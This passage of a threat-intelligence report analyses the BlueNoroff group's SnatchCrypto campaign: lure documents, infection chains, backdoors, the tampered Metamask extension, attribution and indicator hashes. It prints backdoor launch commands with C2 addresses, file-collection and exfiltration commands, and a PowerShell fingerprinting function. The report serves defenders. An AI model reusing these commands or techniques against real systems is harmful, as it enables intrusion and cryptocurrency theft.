compromised.](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113227/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113227/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_03.png>)\n\n**_The companies, whose logos are displayed here, were chosen by BlueNoroff's for impersonation in social engineering tricks. Note, this is no proof that the companies listed were compromised._**\n\nIf you recognize them in incoming communication, there's no reason to panic, but proceed with caution. For example, you can open the incoming documents in a sandboxed or virtualized offline environment, convert the document to a different format or use a non-standard viewer (i.e., server-side document viewer like GoogleDocs, Collabora Online, ONLYOFFICE, Microsoft Office Online, etc.).\n\nIn some cases, we saw what looked like the compromise of an existing registered company and the subsequent use of its resources such as social media accounts, messengers and email to initiate business interaction with the target. If a venture capital company approaches a startup and sends files that look like an investment contract or some other promising documents, the startup won't hesitate to open them, even if some risk is involved and Microsoft Office adds warning messages.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12135443/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_04-632x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12135443/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_04.png>)\n\nA compromised LinkedIn account of an actual company representative was used to approach a target and engage with them. The true company's website is different from the one referenced in the conversation. By manipulating trust in this way, BlueNoroff doesn't even need to burn valuable 0-days. Instead, they can rely on regular macro-enabled documents or older exploits.\n\nWe found they generally stick to CVE-2017-0199, using it again and again before trying something else. The vulnerability initially allowed automatic execution of a remote script linked to a weaponized document. The exploit relies on fetching remote content via an embedded URL inside one of the document meta files. An attentive user may even spot something fishy is happening while MS Word shows a standard loading popup window.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113440/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_05.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113440/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_05.png>)\n\nIf the document was opened offline or the remote content was blocked, it presents some legitimate content, likely scraped or stolen from another party.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113508/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_06-1024x602.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113508/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_06.png>)\n\nIf the document isn't blocked from connecting to the internet, it fetches a remote template that is another macro-enabled document. The two documents are like two ingredients of an explosive that when mixed together produce a blast. The first one contains two base64-encoded binary objects (one for 32-bit and 64-bit Windows) declared as image data. The second document (the remote template) contains a VBA macro that extracts one of these objects, spawns a new process (notepad.exe) to inject and execute the binary code. Although the binary objects have JPEG headers, they are actually only PE files with modified headers.\n\nInterestingly, BlueNoroff shows improved opsec at this stage. The VBA macro does a cleanup by removing the binary objects and the reference to the remote template from the original document and saving it to the same file. This essentially de-weaponizes the document leaving investigators scratching their head during analysis.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113540/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_07.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113540/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_07.png>)\n\nAdditionally, we've seen that this actor utilized an elevation of privilege (EoP) technique in the initial infection stage. According to our telemetry, the _word.exe_ process, created by opening the malicious document, spawned the legitimate process, _dccw.exe_. The _dccw.exe_ process is a Windows system file that has auto-elevate permission. Abusing a _dccw.exe_ file is a known [technique](<https://github.com/L3cr0f/DccwBypassUAC>) and we suspect the malware authors used it to run the next stage malware with high privilege. In another case, we have observed _word.exe_ spawning a notepad.exe that received a malware injection and in turn spawning _mmc.exe_. Unfortunately, the full details of this technique are unavailable due to some missing parts.\n\n## Malware infection\n\nWe assess that the BlueNoroff group's interest in cryptocurrency theft started with the SnatchCrypto campaign that has been running since at least 2017. While tracking this campaign, we've seen several full-infection chains deliver malware. For the initial infection vector, they usually utilized zipped Windows shortcut files or weaponized Word documents. Note that this group has various methods in their infection arsenal and assembles the infection chain to suit the situation.\n\n### Infection chain #1. Windows shortcut\n\nThe group has been utilizing this infection vector for a long time. The actor sent an archive-type file containing a shortcut file and document to the victim. All archives used for the initial infection vector had a similar structure. The archive contained a document file such as Word, Excel or PDF file that was password protected alongside another file disguised as a text file containing the document's password. This file is in fact a Windows shortcut file used to fetch the next stage payload.\n\n[![Archive file and its contents](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113619/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_08-1024x213.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113619/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_08.png>)\n\n**_Archive file and its contents_**\n\nBefore implanting a Windows executable type backdoor, the malware delivered a Visual Basic Script and Powershell Script through multiple stages.\n\n[![Infection chain](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113705/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_09-1024x396.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113705/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_09.png>)\n\n**_Infection chain_**\n\nThe fetched VBS file is responsible for fingerprinting the victim by sending basic system information, network adapter information, and a process list. Next, the Powershell agent is delivered in encoded format. It also sends the victim's general information to the C2 server and next Powershell agent, which is capable of executing commands from the malware operator.\n\n[![VBS and Powershell delivery chain](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113740/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_10-1024x575.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113740/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_10.png>)\n\n**_VBS and Powershell delivery chain_**\n\nUsing this Powershell agent a full-featured backdoor is created, executing with the command line parameter:\n \n \n rundll32.exe %Public%\\wmc.dll,#1 4ZK0gYlgqN6ZbKd/NNBWTJOINDc+jJHOFH/9poQ+or9l\n\nThe malware checks the command line parameter, decoding it with base64 and decrypting it with an embedded key. The decrypted data contains:\n\n * 63429981 63407466 45.238.25[.]2 443\n\nTo verify the parameter's legitimacy, the malware XORs the second parameter with the 0x5837 hex value, comparing it with the first parameter. If both values match, the malware returns the decrypted C2 address and port. The malware also loads a configuration file (%Public%\\Videos\\OfficeIntegrator.dat in this case), decrypting it using RC4. This configuration file contains C2 addresses and the next stage payload path will be loaded. The malware has enriched backdoor functionalities that can control infected machines:\n\n * Directory/File manipulation\n * Process manipulation\n * Registry manipulation\n * Executing commands\n * Updating configuration\n * Stealing stored data from Chrome, Putty, and WinSCP\n\nThese are used to deploy other malware tools to monitor the victim: a keylogger and screenshot taker.\n\n### Infection chain #2. Weaponized Word document\n\nAnother infection chain we've seen started from a malicious Word document. This is where the actor utilized remote template injection (CVE-2017-0199) with an embedded malicious Visual Basic Script. In one file (MD5: [e26725f34ebcc7fa9976dd07bfbbfba3](<https://opentip.kaspersky.com/e26725f34ebcc7fa9976dd07bfbbfba3/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)) the remotely fetched template refers to the first stage document and reads the encoded payload from it, injecting it to the legitimate process.\n\n[![Remote template infection chain](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113826/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_11-1024x379.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113826/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_11.png>)\n\n**_Remote template infection chain_**\n\nThe other case embedded a malicious Visual Basic Script and extracted a Powershell agent on the victim's system. Going through this initial infection procedure results in a Windows executable payload being installed.\n\n[![Infection chain](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114147/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_12-1024x461.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114147/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_12.png>)\n\n**_Infection chain_**\n\nThe persistence backdoor #1 is created in the Start menu path for the persistence mechanism and spawns the first export function with the C2 address.\n \n \n rundll32.exe \"%appdata%\\microsoft\\windows\\start menu\\programs\\maintenance\\default.rdp\",#1 https://sharedocs[.]xyz/jyrhl4jowfp/eyi8t5sjli/qzrk8blr_q/rnyyuekwun/yzm1ncj8yb/a3q==\n\nUpon execution, the malware generates a unique installation ID based on the combined hostname, username and current timestamp, which are concatenated and hashed using a simple string hashing algorithm. After sending a beacon to the C2 server, the malware collects general system information, sending it after AES encryption. The data received from the server is expected to have the following structure:\n\n@ | PROCESS_ID | # | DLL_FILE_SIZE | : | DLL_FILE_DATA \n---|---|---|---|---|--- \n \nThe PROCESS_ID indicates the target process into which the malware will inject a new DLL. DLL_FILE_SIZE is the size of the DLL file to inject. And lastly, DLL_FILE_DATA contains the actual binary executable file to inject.\n\nBased on our telemetry, the actor used another type of backdoor. The persistence backdoor #2 is used to silently run an additional executable payload that is received over an encrypted channel from a remote server. The server address is not hardcoded but rather stored in an encrypted file on the disk (%WINDIR%\\AppPatch\\PublisherPolicy.tms), whose path is hardcoded in the backdoor. The decrypted configuration file has an identical structure to the configuration file used in Infection chain #1.\n\nAs we can see from the above case, the actor behind this campaign delivered the final payload with multi-stage infection and carefully delivered the next payload after checking the fingerprint of the victim. This makes it harder to collect indicators to respond to the attack. With a strict infection chain, a full-featured Windows executable type backdoor is installed. This custom backdoor has long been attributed only to the BlueNoroff group, so we strongly believe that The BlueNoroff group is behind this campaign.\n\n## Assets theft\n\n### Collecting credentials\n\nOne of the strategies this threat actor usually uses after implanting a full-featured backdoor is the common discovery and collection strategy used by APT threat actors. We managed to identify BlueNoroff's hands-on activities on one victim and observed that the group delivered the final payload very selectively. The malware operator mostly relied on Windows commands when performing initial profiling. They collected user accounts, IP addresses and session information:\n\n * cmd.exe /c "query session >%temp%\\TMPBFF2.tmp 2>&1"\n * cmd.exe /c "ipconfig /all >%temp%\\TMPEEE2.tmp 2>&1"\n * cmd.exe /c "whoami >%temp%\\TMP218C.tmp 2>&1"\n * cmd.exe /c "net user [user account] /domain >%temp%\\TMP4B7C.tmp 2>&1"\n * cmd.exe /c "net localgroup administrators >%temp%\\TMP9518.tmp 2>&1"\n * cmd.exe /c "query session >%temp%\\TMPBFF2.tmp 2>&1"\n * cmd.exe /c "ipconfig /all >%temp%\\TMPEEE2.tmp 2>&1"\n\nIn the collection phase, the malware operator also relied on Windows commands. After finding folders of interest, they copied a folder named \u7b56\u7565\u6863\u6848 (Chinese for "_Policy file_") to the previously created "MM" folder for exfiltration. Also, they collected a configuration file related to cryptocurrency software in order to extract possible credentials or other account details.\n\n * cmd.exe /c "mkdir %public%\\MM >%temp%\\TMPF522.tmp 2>&1"\n * xcopy "%user%\\Desktop\\\\[_redacted_]\u5de5\u4f5c\u6587\u6863\\MM\u7b56\u7565\u6863\u6848" %public%\\MM /S /E /Q /Y\n * cmd.exe /c "rd /s /q %public%\\MM >%temp%\\TMP729D.tmp 2>&1"\n * cmd.exe /c "type D:\\2\\Crypt_[redacted]_\\Crypt_[redacted]_.conf >%temp%\\TMP496B.tmp 2>&1\u2033\n\nFrom one victim, we discovered that the operators manually copied a file that was created by one of the monitoring utilities (such as screenshot or keystroke data) to the %TEMP% folder in order to be sent to an attacker-controlled remote resource.\n\n * cmd.exe /c "copy "%appdata%\\Microsoft\\Feeds\\Creds_5FADD329.dat" %public%\\ >%temp%\\TMP11C4.tmp 2>&1\u2033\n\n### Stealing cryptocurrency\n\nIn some cases where the attackers realized they had found a prominent target, they carefully monitored the user for weeks or months. They collected keystrokes and monitored the user's daily operations, while planning a strategy for financial theft.\n\nIf the attackers realize that the target uses a popular browser extension to manage crypto wallets (such as the Metamask extension), they change the extension source from Web Store to local storage and replace the core extension component (backgorund.js) with a tampered version. At first, they are interested in monitoring transactions. The screenshot below shows a comparison of two files: a legitimate Metamask background.js file and its compromised variant with injected lines of code highlighted in yellow. You can see that in this case they set up monitoring of transactions between a particular sender and recipient address. We believe they have a vast monitoring infrastructure that triggers a notification upon discovering large transfers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114239/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_13-1024x493.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114239/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_13.png>)\n\nThe details of the transaction are automatically submitted via HTTP to a C2 server:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114300/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_14.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114300/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_14.png>)\n\nIn another case, they realized that the user owned a substantial amount of cryptocurrency, but used a hardware wallet. The same method was used to steal funds from that user: they intercepted the transaction process and injected their own logic.\n\nAll this sounds easy, but in fact requires a thorough analysis of the Metamask Chrome extension, which is over 6MB of JavaScript code (about 170,000 lines of code) and implementation of a code injection that rewrites transaction details on demand when the extension is used.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114318/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_15-1024x507.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114318/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_15.png>)\n\nThis way, when the compromised user transfers funds to another account, the transaction is signed on the hardware wallet. However, given that the action was initiated by the user at the very right moment, the user doesn't suspect anything fishy is going on and confirms the transaction on the secure device without paying attention to the transaction details. The user doesn't get too worried when the size of the payment he/she inputs is low and the mistake feels insignificant. However, the attackers modify not only the recipient address, but also push the amount of currency to the limit, essentially draining the account in one move.\n\nThe injection is very hard to find manually unless you are very familiar with the Metamask codebase. However, a modification of the Chrome extension leaves a trace. The browser has to be switched to Developer mode and the Metamask extension is installed from a local directory instead of the online store. If the plugin comes from the store, Chrome enforces digital signature validation for the code and guarantees code integrity. So, if you are in doubt, immediately check your Metamask extension and Chrome settings.\n\n[![Developer mode enabled in Google Chrome](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114351/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_16-1024x427.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114351/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_16.png>)\n\n**_Developer mode enabled in Google Chrome_**\n\n[![If you use Developer mode, make sure your important extensions come from the Web Store](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114426/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_17-1024x443.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114426/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_17.png>)\n\n**_If you use Developer mode, make sure your important extensions come from the Web Store_**\n\n[![Unless you are a Metamask developer yourself, this may indicate a Trojanized extension](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114454/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_18-1024x384.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114454/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_18.png>)\n\n**_Unless you are a Metamask developer yourself, this may indicate a Trojanized extension_**\n\n## SnatchCrypto's victims\n\nThe target of the SnatchCrypto campaign is not limited to specific countries and continents. This campaign is aimed at various companies that by the nature of their work deal with cryptocurrencies and smart contracts, DeFi, blockchains, and FinTech industry.\n\nAccording to our telemetry, we discovered victims from Russia, Poland, Slovenia, Ukraine, the Czech Republic, China, India, the US, Hong Kong, Singapore, the UAE and Vietnam. However, based on the shortened URL click history and decoy documents, we assess there were more victims of this financially motivated attack campaign.\n\n[![BlueNoroff victims](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114552/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_19-1024x467.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114552/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_19.png>)\n\n**_BlueNoroff victims_**\n\nIn addition to the above-mentioned countries, we observed uploads of weaponized documents and compromised Metamask extensions from Indonesia, the UK, Sweden, Germany, Bulgaria, Estonia, Russia, Malta and Portugal.\n\n## SnatchCrypto's attribution\n\nWe assess with high confidence that the financially motivated BlueNoroff group is behind this campaign. As a result of understanding the SnatchCrypto campaign's full chain of infection, we can identify several overlaps with the BlueNoroff group's previous activities.\n\n### VBA macro authorship\n\nAnalysis of the VBA macro from the remote template used during the initial infection revealed that the code matched the style and technique previously used by Cl\u00e9ment Labro, an offensive security researcher from the company SCRT based out of Morges, Vaud, Switzerland. The original code for process injection from the VBA macro hasn't been found in the public, so either Cl\u00e9ment has privately developed it and later it became available to BlueNoroff, or someone adapted his other VBA code, such as [the VBA-RunPE project](<https://github.com/itm4n/VBA-RunPE/blob/master/RunPE.vba>).\n\n### PowerShell scripts overlap\n\nOne tool this group relied heavily on is the PowerShell script. Through an initial infection they deployed PowerShell agents on several victims, sending basic system information and executing commands from the control server. They have utilized this PowerShell continuously, while adding small updates.\n\n**PowerShell script used in previous BlueNoroff campaign** | **PowerShell script used in 2021 campaign** \n---|--- \n \nfunction GetBasicInformation \n{ \n$HostName = [System.Environment]::MachineName; \n$UserName = [System.Environment]::UserName; \n$DomainName = [System.Environment]::UserDomainName; \n$CurrentDir = [System.Environment]::CurrentDirectory; \n$BinPath = [System.Environment]::GetCommandLineArgs()[0]; \n$OSVersion = [System.Environment]::OSVersion.VersionString; \n$Is64BitOS = [System.Environment]::Is64BitOperatingSystem; \n$Is64BitProcess = [System.Environment]::Is64BitProcess; \n$PSVersion = 'PS ' \\+ [System.Environment]::Version; \n$BasicInformation = $HostName + '|' \\+ $UserName + '|' \\+ $DomainName + '|' \\+ $CurrentDir + '|' \\+ $BinPath + '|' \\+ $OSVersion + '|' \\+ $Is64BitOS + '|' \\+ $Is64BitProcess + '|' \\+ $PSVersion; \nreturn $BasicInformation; \n}function ProcessCommand \n{\n\n| \n\nfunction GetBI \n{ \n$HostName = [System.Environment]::MachineName; \n$UserName = [System.Environment]::UserName; \n$DomainName = [System.Environment]::UserDomainName; \n$CurrentDir = [System.Environment]::CurrentDirectory; \n$BinPath = [System.Environment]::GetCommandLineArgs()[0]; \n$OSVersion = [System.Environment]::OSVersion.VersionString; \n$Is64BitOS = [System.Environment]::Is64BitOperatingSystem; \n$Is64BitProcess = [System.Environment]::Is64BitProcess; \n$PSVersion = [System.Environment]::Version;$BasicInformation = $HostName + '|' \\+ $UserName + '|' \\+ $DomainName + '|' \\+ $CurrentDir + '|' \\+ $BinPath + '|' \\+ $OSVersion + '|' \\+ $Is64BitOS + '|' \\+ $Is64BitProcess + '|' \\+ $PSVersion;return $BasicInformation; \n}function ProcessCommand \n{ \n \n### Backdoor overlap\n\nThrough the complicated infection chain, a Windows executable type backdoor is eventually installed on the victim machine. We can only identify this backdoor malware from a few hosts. It has many code similarities with previously known BlueNoroff malware. Using Kaspersky Threat Attribution Engine (KTAE), we see that the malware binaries used in this campaign have considerable code similaritis with known tools of the BlueNoroff group.\n\n[![Code similarity of backdoor](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114636/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_20-1024x256.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114636/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_20.png>)\n\n**_Code similarity of backdoor_**\n\nIn addition, we can identify uncommon techniques usually discovered from the BlueNoroff group's malware. The group's malware acquires a real C2 address by XORing the resolved IP address with a hardcoded DWORD value. We saw the same technique in our previous BlueNoroff [report](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf>). The malware used in the SnatchCrypto campaign also used the same technique to acquire real C2 addresses.\n\n[![Similar C2 address acquiring scheme](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114706/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_21-1024x211.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114706/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_21.png>)\n\n**_Similar C2 address acquiring scheme_**\n\nIn addition, based on the metadata of the Windows shortcut files, we found that the actor behind this campaign is familiar with the Korean operating system environment.\n \n \n [String Data]\n Working Directory (UNICODE): \t %currentdir%\n Arguments (UNICODE): \t\t hxxps://bit[.]ly/2Q9tfCz\n Icon location (UNICODE): \t C:\\Windows\\notepad.exe\n [Console Code Page]\n Code page: 949 (EUC-KR)\n\n## BlueNoroff's indicators of compromise\n\n**Malicious shortcut files** \n033609f8672303feb70a4c0f80243349 \n2100e6e585f0a2a43f47093b6fabde74 \n4a3de148b5df41a56bde78a5dcf41975 \n5af886030204952ae243eedd25dd43c4 Password.txt.lnk \n5f761f9aa3c1a76b17f584b9547a01a7 Password.txt.lnk \n7a4a0b0f82e63941713ffd97c127dac8 Password.txt.lnk \n813203e18dc1cc8c70d36ed691ca0df3 \n961e6ec465d7354a8316393b30f9c6e9 Gdpr Password.txt.lnk \n9ea244f0a0a955e43293e640bb4ee646 \na3c61de3938e7599c0199d2778f7d417 Password.txt.lnk \na5d4bfc3eab1a28ffbcba67625d8292e \na94529063c3acdbfa770657e9126b56d \nab095cb9bc84f37a0a655fbc00e5f50e \nb52d30d1db40d5d3c375c4a7c8a115c1 \ndd2569684ca52ed176f1619ecbfa7aaa \ndff21849756eca89ebfaa33ed3185d95 \ne18dd8e61c736cfc6fff86b07a352c12 \ne546b851ac4fa5a111d10f40260b1466 \ne6e64c511f935d31a8859e9f3147fe24 Password.txt.lnk \nea7ed84f7936d4cbafa7cec51fe39cf7 \nf414f6590636037a6ec92a4d951bdf55 \n4e207d6e930db4293a6d720cf47858fc \n5e44deca6209e64f4093beae92db0c93 Password.txt.lnk \n84c427e002fd162d596f3f43ce86fd6a Password.txt.lnk \nc16977fefbdc825a5c6760d2b4ea3914 \ne5d12ef32f9bd3235d0ac45013040589 \n09bca3ddbc55f22577d2f3a7fda22d1c Password.txt.lnk \n0eb71e4d2978547bd96221548548e9f0 Password.txt.lnk \nda599b0cde613b5512c13f299fec739e Password.txt.lnk \n0c9170a2584ceeddb89e4c0f0a2353ed Password.txt.lnk \n5053103dd5d075c1dc54edf1f8568098 Password.txt.lnk \n536bae311c99a4d46f503c68595d4431 Password.txt.lnk \n3078265f207fed66470436da07343732 Password.txt.lnk \n15f1ae1fed1b2ea71fdb9661823663c6 Password.txt.lnk \n56fe283ca3e1c1667191cc7764c260b6 Password.txt.lnk \n850751de7b8e158d86469d22ad1c3101 Password.txt.lnk \n1a8282f73f393656996107b6ec038dd5 Password.txt.lnk \n2ea2ceab1588810961d2fc545e2f957e Password.txt.lnk \n561f70411449b327e3f19d81bb2cea08 Password.txt.lnk \n3812cdc4225182326b1425c9f3c2d50b Password.txt.lnk \n4274e6dbc2b7aee4ef080d19fff47ce7 Password.txt.lnk \n427bdfe4425e6c8e3ea41d89a2f55870 Password.txt.lnk \n7a83be17f4628459e120a64fcab70bac Password.txt.lnk \n5d662269739f1b81072e4c7e48972420 Password.txt.lnk \n244a23172af8720882ae0141292f5c47 Password.txt.lnk \na8e2c94abb4c1e77068a5e2d8943296c Password.txt.lnk \n89c26cefa057cf21054e64b5560bf583 Xbox.lnk \n805949896d8609412732ee7bfb44900a Password.txt.lnk \na2be99a5aa26155e6e42a17fbe4fd54d Security Bugs in rigs.pdf.lnk \n28917b4187b3b181e750bf024c6adf70 readme.txt.lnk \n9f8e51f4adc007bb0364dfafb19a8c11 UserAssist.lnk \n790a21734604b374cf260d20770bfc96 SALT Lending Opportunities.pdf.lnk \ndb315d7b0d9e8c9ca0aa6892202d498b Password.txt.lnk \n02904e802b5dc2f85eec83e3c1948374 Security Bugs in Operation.pdf.lnk \nbaebc60beaced775551ec23a691c3da6 \n302314d503ae88058cb4c33a6ac6b79b Password.txt.lnk \naeac6f569fb9a7d3f32517aa16e430d6 Password.txt.lnk \n926DEEAF253636521C26442938013204 \n8064e00b931c1cab6ba329d665ea599c MSEdge.lnk \nbcb4a8f190f2124be57496649078e0ae \n781a20f27b72c1c901164ce1d025f641 MSAssist.lnk \n483e3e0b1dceb4a5a13de65d3556c3fe MSAssist.lnk\n\n**Malicious documents** \n00a63a302dcaffc9f28826e9dba30e03 Abies VC Presentation.docx \nee9dda6bbbb1138263873dbef36a4d42 Abies VC Presentation.docx \n0f1c81c2023eae0fc092ce9f58213bcf Abies VC Presentation.docx \n491e0d776f01f102d36155a46f1a8e3c Ant Capital Presentation (Azure Protected).docx \nc33ce08ebcc6e508bb3a17e0fa7b08f8 Global Brain Pitch Deck.docx \nb1911ef720b17aeed69ec41c8e94cc1e \n340fb219872ce3c0d3acf924f4f9e598 Venture Labo Investment Pitch Deck.docx \n380e9e78dc5bc91fb6cdd8b4a875f20a \neb18ac97dba79ea48c185fb2826467fe \n2a9ff6d80cdd4aeed1c48a1ccdc525dd Abies VC Presentation.docx \necf75bec770edcd89a3c16d3c4edde1a Abies VC Presentation (1).docx \n6c4943f4c28a07ee8cae41dad16d72b3 Abies VC Presentation.docx \nf76e2e6bfbee77ae36049880d7c227f7 Abies VC Presentation.docx \n7aec3d1b24ed0946ab740924be5834fa Abies VC Presentation.docx \n47e325e3467bfa80055b7c0eebb11212 Abies VC Presentation.docx \n1e0d96c551ca31a4055491edc17ce2dd Abies VC Presentation.docx \nbcf97660ce2b09cbffb454aa5436c9a0 Digital Asset Investment Stategy 2020 (ISO 27001).docx \n13ff15ac54a297796e558bb96feaacfd Abies VC Presentation(ISO 27001).docx \ncace67b3ea1ce95298933e38311f6d0b Adviser-Non-Disclosure-Agreement-NDA(ISO 27001).docx \n645adf057b55ef731e624ab435a41757 OKEx and DeepMind Intro Deck(ISO 27001_Protected).docx \nbde4747408ce3cfdfe8238a133ebcac9 Circle Business Introduction(ISO 27001).docx \n421b1e1ab9951d5b8eeda5b041cb0657 Berkshire Hathaway HomeServices Custody - Mutual NDA.docx \nd2f08e227cd528ad8b26e9bbe285ae3c Union Square Ventures Partnership - Mutual NDA Form.docx \n04deb35316ebe1789da042c8876c0622 Chiliz Partnership - Mutual NDA Form.docx \naf4eefa8cddc1e412fe91ad33199bd71 FasterCapital Mutual NDA Form.docx \n34239a3607d8b5b8ddd6797855f2e827 FasterCapital Introduction 2020 Oct.docx \n389172d2794d789727b9f7d01ec27f75 Lundbergs NDA Mutual Form.docx \nf40e7998a84495648b0338bc016b9417 Union Square Ventures Partnership - Mutual NDA Form.docx \nc8c2a9c50ff848342b0885292d5a8cd4 VIRUS.docx \nadf9dc317272dc3724895cb07631c361 Non-Disclosure-Agreement-NDA(ISO 27001).docx \n158d84c90a79edb97ec5b840d86217c7 Venture Labo Investment Pitch Deck.docx \ne26725f34ebcc7fa9976dd07bfbbfba3 Global Brain Pitch Deck.docx \na435acb5bac92b855d1799a685507522 \n9969b67ef643bed20a38346dcd69bec4 \na6446bfea82b69169b4026222ca253b2 \nbdf1643c3a10a25d3aba2c4c608ec5d5 \nb4b695c8e6fea95db5843a43644f88b0 \nd8561c74ad9624d7c35c0fb15d3ca8fe \nf9195b14ed20b30b7c239d50e6418151 \n3dd638551b03a36d13428696dcada5d8 \nf26eaa212c503aaba6e5015cb8ef44b5 Venture Labo Investment Pitch Deck.docx \n793de76de6d4015ebdd5e552ac5b2f90 Pantera Capital Investment Agreement(Protected).docx \n709ec9fbbc3c37ccd39758527c332b84 Pantera Capital Investment Agreement(Protected).docx \n89099235aad37a29b7acedc96fda0037 Venture Labo Investment Pitch Deck.docx \n358791e1abd64f490c865643a3fbb93d Z Venture Capital Presentation(Protected).docx \ncea54a904434c66f217fbadc571e1507 Z Venture Capital Presentation(Protected).docx \n9be0075b9344590b3cabf61c194db180 Rapid Change of Stablecoin (Protected).docx \n98e30453bbf1c9c9f48368f9bbe69edd Z Venture Capital Presentation(Protected).docx \n9ad7b21603ecce5ee744ba8aa387fb6c Pantera Capital Investment Agreement(Protected).docx.123.docx.123\n\n**Injected remote template** \n3dd638551b03a36d13428696dcada5d8 \n2da244dc9bbdbf2013b7fbc2a74073a2 \nf3157dc297cb802c8ae2f07702903bfa\n\n**Visual Basic Script** \nce09cdb7979fb9099f46dd33036b9001 xivwtjab.vbs \nf7f4aa55a2e4f38a6a3ea5a108baedf5 vwnozphn.vbs\n\n**Powershell** \nae52b28b360428829c4fcdc14e839f19 usoclient.ps1\n\n## **Powershell agent(VBS-wrapped)**\n\n73572519159b0c27a18dbbaf25ef1cc0 guide.vbs \n8ae6aa90b5f648b3911430f14c92440b %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\check.vbs \nae12a668dd9f254c42fcd803c7645ed1 1.vbs \n589f1bb4da89cfd4a2f7f3489aa426a9 %APPDATA%\\microsoft\\windows\\start menu\\programs\\startup\\guide.vbs \n73572519159b0c27a18dbbaf25ef1cc0 guide.vbs\n\n**Backdoor** \n1d0fc2f1a6eb2b2bfa166a613ca871f0 \ndb91826cb9f2ad6edfed8d6bab5bef1f users.dll, wmc.dll \n9c592a22acdfb750c440fda31da4996c\n\n**Keylogger** \nf29be5c7e602e529339fda35ff91bd39\n\n**Screencapture malware**\n\nf194e074e7d73c544eebb70e2e2785a1\n\n**Injector** \nec2b51dc1dc99165a0eb46b73c317e25 